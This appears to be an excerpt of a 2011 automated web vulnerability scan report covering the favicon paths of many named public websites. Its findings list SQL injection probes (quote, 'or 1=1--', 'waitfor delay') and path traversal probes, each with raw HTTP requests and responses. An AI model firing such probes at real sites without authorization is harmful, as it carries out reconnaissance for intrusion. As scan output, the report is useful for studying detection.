27.143. http://www.netflix.com/favicon.ico
27.144. http://www.newgrounds.com/favicon.ico
27.145. http://www.newsdaily7.com/favicon.ico
27.146. http://www.newsok.com/favicon.ico
27.147. http://www.nextag.com/favicon.ico
27.148. http://www.northerntool.com/favicon.ico
27.149. http://www.oodle.com/favicon.ico
27.150. http://www.opportunity.co/favicon.ico
27.151. http://www.oprah.com/favicon.ico
27.152. http://www.orientaltrading.com/favicon.ico
27.153. http://www.ourstage.com/favicon.ico
27.154. http://www.ovguide.com/favicon.ico
27.155. http://www.partypoker.com/favicon.ico
27.156. http://www.payless.com/favicon.ico
27.157. http://www.pctools.com/favicon.ico
27.158. http://www.phoenix.edu/favicon.ico
27.159. http://www.phoneagentsource.com/favicon.ico
27.160. http://www.pittsburghlive.com/favicon.ico
27.161. http://www.playfin.com/favicon.ico
27.162. http://www.playstation.com/favicon.ico
27.163. http://www.playsushi.com/favicon.ico
27.164. http://www.politico.com/favicon.ico
27.165. http://www.polyvore.com/favicon.ico
27.166. http://www.popsugar.com/favicon.ico
27.167. http://www.poptropica.com/favicon.ico
27.168. http://www.potterybarn.com/favicon.ico
27.169. http://www.prlog.org/favicon.ico
27.170. http://www.pronto.com/favicon.ico
27.171. http://www.qualityhealth.com/favicon.ico
27.172. http://www.radaronline.com/favicon.ico
27.173. http://www.rawtube.com/favicon.ico
27.174. http://www.real.com/favicon.ico
27.175. http://www.rei.com/favicon.ico
27.176. http://www.rollingstone.com/favicon.ico
27.177. http://www.rottentomatoes.com/favicon.ico
27.178. http://www.rushlimbaugh.com/favicon.ico
27.179. http://www.salon.com/favicon.ico
27.180. http://www.samsung.com/favicon.ico
27.181. http://www.shutterfly.com/favicon.ico
27.182. http://www.smarter.com/favicon.ico
27.183. http://www.smugmug.com/favicon.ico
27.184. http://www.songlyrics.com/favicon.ico
27.185. http://www.sony.com/favicon.ico
27.186. http://www.space.com/favicon.ico
27.187. http://www.spanishdict.com/favicon.ico
27.188. http://www.squidoo.com/favicon.ico
27.189. http://www.staples.com/favicon.ico
27.190. http://www.suite101.com/favicon.ico
27.191. http://www.supercheats.com/favicon.ico
27.192. http://www.tagged.com/favicon.ico
27.193. http://www.takkle.com/favicon.ico
27.194. http://www.talkingpointsmemo.com/favicon.ico
27.195. http://www.techsupportforum.com/favicon.ico
27.196. http://www.thedailybeast.com/favicon.ico
27.197. http://www.thefrisky.com/favicon.ico
27.198. http://www.tinypic.com/favicon.ico
27.199. http://www.tomshardware.com/favicon.ico
27.200. http://www.toptenreviews.com/favicon.ico
27.201. http://www.trulia.com/favicon.ico
27.202. http://www.twitlonger.com/favicon.ico
27.203. http://www.umn.edu/favicon.ico
27.204. http://www.ups.com/favicon.ico
27.205. http://www.urbandictionary.com/favicon.ico
27.206. http://www.vast.com/favicon.ico
27.207. http://www.verisign.com/favicon.ico
27.208. http://www.vitals.com/favicon.ico
27.209. http://www.weather.gov/favicon.ico
27.210. http://www.webgains.com/favicon.ico
27.211. http://www.webkinz.com/favicon.ico
27.212. http://www.webring.org/favicon.ico
27.213. http://www.wired.com/favicon.ico
27.214. http://www.wnd.com/favicon.ico
27.215. http://www.woot.com/favicon.ico
27.216. http://www.worldwinner.com/favicon.ico
27.217. http://www.worthpoint.com/favicon.ico
27.218. http://www.wsbtv.com/favicon.ico
27.219. http://www.xomba.com/favicon.ico
27.220. http://www.yfrog.com/favicon.ico
27.221. http://www.yidio.com/favicon.ico
27.222. http://www.yourfilehost.com/favicon.ico
27.223. http://www.yuku.com/favicon.ico
27.224. http://www.zabasearch.com/favicon.ico
27.225. http://www.zmags.com/favicon.ico
28. Content type is not specified
28.1. http://www.4shared.com/favicon.ico
28.2. http://www.6pm.com/favicon.ico
28.3. http://www.bizrate.com/favicon.ico
28.4. http://www.blockbuster.com/favicon.ico
28.5. http://www.boldchat.com/favicon.ico
28.6. http://www.bookrags.com/favicon.ico
28.7. http://www.chacha.com/favicon.ico
28.8. http://www.dailymail.co.uk/favicon.ico
28.9. http://www.dominos.com/favicon.ico
28.10. http://www.gap.com/favicon.ico
28.11. http://www.hi5.com/favicon.ico
28.12. http://www.hotwire.com/favicon.ico
28.13. http://www.instructables.com/favicon.ico
28.14. http://www.jstor.org/favicon.ico
28.15. http://www.medcohealth.com/favicon.ico
28.16. http://www.mynewplace.com/favicon.ico
28.17. http://www.officedepot.com/favicon.ico
28.18. http://www.outbrain.com/favicon.ico
28.19. http://www.pogo.com/favicon.ico
28.20. http://www.retrevo.com/favicon.ico
28.21. http://www.rightathome.com/favicon.ico
28.22. http://www.savings.com/favicon.ico
28.23. http://www.shopzilla.com/favicon.ico
28.24. http://www.techbargains.com/favicon.ico
28.25. http://www.tracfone.com/favicon.ico
28.26. http://www.va.gov/favicon.ico
28.27. http://www.webs.com/favicon.ico
28.28. http://www.zappos.com/favicon.ico
Severity: | High |
Confidence: | Tentative |
Host: | http://ad.doubleclick.net |
Path: | /adi/N1260.Google.com |
GET /adi/N1260.Google.com Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=46b610ae08 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sat, 02 Apr 2011 13:00:36 GMT Vary: Accept-Encoding Expires: Sat, 02 Apr 2011 13:00:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7132 <html><head><title ...[SNIP]... <!-- Code auto-generated on Thu Jan 06 11:17:22 EST 2011 --> <script src="http://s0.2mdn.net <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net var gif = "http://s0.2mdn.net var minV = 8; var FWH = ' width="728" height="90" '; var url = escape("http://ad var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0; var moviePath=swf.substring(0 var sm=new Array(); var defaultCtVal = escape("http://ad ...[SNIP]... |
GET /adi/N1260.Google.com Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=46b610ae08 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sat, 02 Apr 2011 13:00:37 GMT Vary: Accept-Encoding Expires: Sat, 02 Apr 2011 13:00:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7144 <html><head><title ...[SNIP]... <!-- Code auto-generated on Mon Jan 31 10:15:05 EST 2011 --> <script src="http://s0.2mdn.net <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net var gif = "http://s0.2mdn.net var minV = 8; var FWH = ' width="728" height="90" '; var url = escape("http://ad var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0; var moviePath=swf.substring(0 var sm=new Array(); var defaultCtVal = escape("http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=46b610ae08 |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 02 Apr 2011 13:04:58 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 12326 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... G1sL2Nyb3NzLXNpdGUtc ...[SNIP]... |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=46b610ae08 |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 02 Apr 2011 13:04:59 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 4641 <html><head><style><!-- a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!-- (function(){window.ss ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.airtran.com |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.airtran.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: /ErrorHandler/CustomError.aspx Content-Type: text/html; charset=utf-8 Content-Length: 184 Cache-Control: private, max-age=548 Expires: Sat, 02 Apr 2011 14:12:54 GMT Date: Sat, 02 Apr 2011 14:03:46 GMT Connection: close <html><head><title>Object moved</title></head><body <h2>Object moved to <a href='/ErrorHandler </body></html> |
GET /favicon.ico'' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.airtran.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Cache-Control: private, max-age=600 Expires: Sat, 02 Apr 2011 14:13:47 GMT Date: Sat, 02 Apr 2011 14:03:47 GMT Content-Length: 10394 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bbt.com |
Path: | /favicon.ico |
GET /favicon.ico'waitfor%20delay'0%3a0 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.bbt.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 - Not Found content-type: text/html date: Sat, 02 Apr 2011 13:44:37 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15424 cache-control: private x-powered-by: ASP.NET Set-Cookie: AMWEBJCT!%2Fbbt Set-Cookie: PD_STATEFUL_347ae440-9ca4 Content-Length: 15564 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="DCS.dcsuri" content="/404err ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dealtime.com |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.dealtime.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Set-Cookie: brc=www.dealtime.com; Domain=dealtime.com; Expires=Sun, 03-Apr-2011 13:39:15 GMT; Path=/ Set-Cookie: JSESSIONID=805851EED Set-Cookie: session=ts%3D2%5EPVS%3D1; Domain=.dealtime.com; Path=/ Set-Cookie: reloadCheck=%2Ffavicon Set-Cookie: perm=countryCode%3Dus; Domain=.dealtime.com; Expires=Thu, 01-Apr-2021 13:39:15 GMT; Path=/ Set-Cookie: DealTimeUserID=Q2kuror0CK Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 02 Apr 2011 13:39:14 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <body id="error"> ...[SNIP]... |
GET /favicon.ico'' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.dealtime.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Set-Cookie: brc=www0.dealtime.com; Domain=dealtime.com; Expires=Sun, 03-Apr-2011 13:39:15 GMT; Path=/ Location: http://www0.dealtime.com Set-Cookie: session=ts%3D2; Domain=.dealtime.com; Path=/ Content-Length: 0 Date: Sat, 02 Apr 2011 13:39:15 GMT Connection: close |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.essortment.com |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.essortment.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Content-Length: 122 Server: TornadoServer/0.1 Vary: Accept-Encoding Date: Sat, 02 Apr 2011 13:35:16 GMT Connection: close You don't even get a site specific 404: HTTP 500: Internal Server Error ({ "GrammarParsingError": "Invalid CQL : '" }) |
GET /favicon.ico'' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.essortment.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Content-Type: text/html Server: TornadoServer/0.1 Date: Sat, 02 Apr 2011 13:35:17 GMT Content-Length: 14756 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html lang="en-US" xmlns="http://www.w3.org ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.ftd.com |
Path: | /favicon.ico |
GET /favicon.ico13030870'%20or%201%3d1-- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.ftd.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 503 Service Unavailable Server: Varnish Retry-After: 0 Content-Type: text/html; charset=utf-8 Content-Length: 419 Date: Sat, 02 Apr 2011 13:47:27 GMT X-Varnish: 1965658938 Age: 14 Via: 1.1 varnish Connection: close <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>503 Service Unavailable</title> </head> <body> <h1>Error 503 Service Unavailable</h1> <p>Service Unavailable</p> <h3>Guru Meditation:</h3> <p>XID: 1965658938</p> <hr> <p>Varnish cache server</p> </body> </html> |
GET /favicon.ico13030870'%20or%201%3d2-- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.ftd.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: TLTSID=BF7AFCBE5D2F1 Set-Cookie: TLTUID=BF7AFCBE5D2F1 Vary: Accept-Encoding X-Accelerator-Vary: Accept-Encoding P3P: CP="STA CUR TAI" X-VR-Note: no-gzip: UA=curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT Content-Type: text/html Content-Length: 80223 Date: Sat, 02 Apr 2011 13:47:28 GMT X-Varnish: 1841592671 Age: 0 Via: 1.1 varnish Connection: keep-alive <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org xmlns:og="http:/ xmlns:fb="http://www <head> <link rel="icon" href="http://www.ftd.com <script language="javascript" type="text/javascript"> <!-- var cookie_domain = ".ftd.com"; // because we modify the document.domain and we have some javascript // that references document.domain but expects it to be our actual full domain // we save it before we use it. var our_domain = document.domain; var imageurl = "http://www.ftdimg.com"; var markcode = "350"; var js_debug = 0; var secure_url = "https://ordering.ftd.com var nonsecure_url = "http://www.ftd.com"; var seo_urls = 1; var isFlorist = 0; document.domain = "ftd.com"; //--> </script> <script language="javascript" src="http://www.ftdimg <script language="javascript" type="text/javascript"> <!-- // we are going to set up a window onerror function // this will call our regular try/catch error function // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks // are actually better then using the window.onerror event. try { // now we re-set our oner ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.guitarcenter |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527 Host: www.guitarcenter.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 SN: 88 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:15:08 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; cha ...[SNIP]... <h2>HTTP Error 404 - File or directory not found.<br> ...[SNIP]... |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527%2527 Host: www.guitarcenter.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:15:10 GMT Server: Microsoft-IIS/6.0 ETag: SN: 27 X-Powered-By: ASP.NET Set-Cookie: ASP.NET_SessionId Set-Cookie: ref=; path=/ Set-Cookie: ref_d=4/2/2011 10:15:10 AM; path=/ Set-Cookie: source=; path=/ Set-Cookie: ad_id=; path=/ Set-Cookie: orig_ref=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/ Set-Cookie: orig_ref_d=4/2/2011 10:15:10 AM; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/ Set-Cookie: orig_source=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/ Set-Cookie: orig_ad_id=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/ Set-Cookie: uid=2e7cae34-cedd-47d9 Set-Cookie: IsLoyaltyAvailable=False; expires=Mon, 02-May-2011 14:15:10 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 65425 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00__htmHead"><s ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.inc.com |
Path: | /favicon.ico |
GET /favicon.ico' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.inc.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 500 Internal Server Error Date: Sat, 02 Apr 2011 14:21:04 GMT Server: VoxCAST X-Powered-By: PHP/5.2.11 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS from VoxCAST Connection: close |
GET /favicon.ico'' HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.inc.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:21:05 GMT Server: VoxCAST X-Powered-By: PHP/5.2.11 Content-Type: text/html; charset=UTF-8 X-Cache: MISS from VoxCAST Content-Length: 39399 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.psu.edu |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.psu.edu Accept: */* Proxy-Connection: Keep-Alive Referer: http://www.google.com |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:04:38 GMT Server: Apache/1.3.41 (Unix) Content-Type: text/html Content-Length: 5468 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </a> > Error 404 - Page not found <!-- InstanceEndEditable --> ...[SNIP]... |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.psu.edu Accept: */* Proxy-Connection: Keep-Alive Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:04:38 GMT Server: Apache/1.3.37 (Unix) Last-Modified: Wed, 08 Jun 2005 11:51:35 GMT ETag: "135d-400-42a6dbc7" Accept-Ranges: bytes Content-Length: 1024 Content-Type: image/x-icon .PNG . ...IHDR................a... pHYs.................gAMA ......@..E...}.. ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.psu.edu |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3' Host: www.psu.edu Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 14:04:30 GMT Server: Apache/1.3.41 (Unix) Content-Type: text/html Content-Length: 5468 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </a> > Error 404 - Page not found <!-- InstanceEndEditable --> ...[SNIP]... |
GET /favicon.ico HTTP/1.1 User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3'' Host: www.psu.edu Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:04:30 GMT Server: Apache/1.3.37 (Unix) Last-Modified: Wed, 08 Jun 2005 11:51:35 GMT ETag: "135d-400-42a6dbc7" Accept-Ranges: bytes Content-Length: 1024 Content-Type: image/x-icon .PNG . ...IHDR................a... pHYs.................gAMA ......@..E...}.. ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.scholastic.com |
Path: | /favicon.ico |
GET /favicon.ico11468862'%20or%201%3d1-- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.scholastic.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 301 Moved Permanently Server: nginx/0.7.64 Content-Type: text/html X-Powered-By: ASP.NET Location: http://www2.scholastic Content-Length: 0 Vary: Accept-Encoding Date: Sat, 02 Apr 2011 13:54:12 GMT Connection: close Set-Cookie: ASPSESSIONIDCSDACTBQ Cache-Control: private |
GET /favicon.ico11468862'%20or%201%3d2-- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.scholastic.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: nginx/0.7.64 Content-Type: text/html X-Powered-By: ASP.NET Content-Length: 5443 Vary: Accept-Encoding Date: Sat, 02 Apr 2011 13:54:12 GMT Connection: close Set-Cookie: ASPSESSIONIDCSDACTBQ Cache-Control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Error Page</title> <link rel="stylesheet" href="/css/header.css" type="text/css"> <script type="text/javascript" type="text/javascript" src="/menu/templates <!-- MSN --> <script type="text/javascript" src="/menu/templates <!-- /MSN --> </head> <body > <div id="schlPageWrapper"> <script type="text/javascript" <script type="text/javascript" src="/universal/universal <div id="schlPageContent"> <div id="schlHeader"> <table border="0" cellpadding="0" cellspacing="0" id="innerHeader"> <tr valign="bottom"> <td id="schlChannel"> < <td> <div id="schlSearchBox"> <form name="searchForm" action=" http://www2.scholastic <table border="0" cellpadding="0" cellspacing="0" width="278"> <tr> <td id="txtSearch"><input type="text" size="20" name="query" value="" class="txtSearch" /></td> <td><input type="image" src="/images/nav3.o </tr> </table> </div> </form> </div> </td> </tr> </table> </div><!-- /header --> <div id="schlMainContent"> <div id="schlContent"> <!--div id="schlSkyscraper">  <div id="schlLegacy"> <img src="/images/nav3.o <div class="box743Borders"> <!--begin page content--> <!-- REQUEST URI: /404error.asp --> <!-- curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 --> <!-- generic.html --> <!-- ORIGINAL BODY TAG -- ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.bodybuilding |
Path: | /favicon.ico |
GET /favicon.ico../../../../.. User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.bodybuilding.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.6-1+lenny3 Content-Type: text/html Date: Sat, 02 Apr 2011 13:40:37 GMT Content-Length: 30357 Connection: close <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'> <html> <head> <!-- Rawberry --> <title>Bodybuilding.com - PAGE NOT FOUND! 404 Error.</title> <meta name ...[SNIP]... server="" s.channel="root" s.products="" s.prop30="B" s.eVar30="B" s.prop41="Anonymous" s.eVar41="Anonymous" s.prop1="Fun: Article" s.eVar1="Fun: Article" s.prop2="Article" s.eVar2="Article" s.prop33="Root: PAGE NOT FOUND! 404 Error." s.eVar33="Root: PAGE NOT FOUND! 404 Error." s.events="event3" s.pageType="" /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_cod ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.buzzfeed.com |
Path: | /favicon.ico |
GET /favicon.ico../../../../.. User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.buzzfeed.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 13:37:18 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Sat, 02 Apr 2011 13:00:01 GMT ETag: "1190105-69e2-49fef1 Accept-Ranges: bytes Content-Length: 27106 Vary: Accept-Encoding,User X-BuzzFeed: feed5 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script type="text/javascript"> fb_is_enabled = false; fb_is_enabled = true; var BF_STATIC = {static_root: 'http://s-ak.buzzfed.com ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.cabelas.com |
Path: | /favicon.ico |
GET /favicon.ico../../../../.. User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.cabelas.com Accept: */* Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Server: Apache Last-Modified: Sat, 02 Apr 2011 07:00:02 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=604800 Date: Sat, 02 Apr 2011 13:32:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 53787 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html > <head> <title>Cabela's - Page Not Found</title> <!--[if lt IE ...[SNIP]... <li class="heading">Other Ways to Shop Home & Cabin:</li> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.info.com |
Path: | /favicon.ico |
GET /favicon.ico..\..\..\..\.. User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.info.com Accept: */* Proxy-Connection: Keep-Alive |
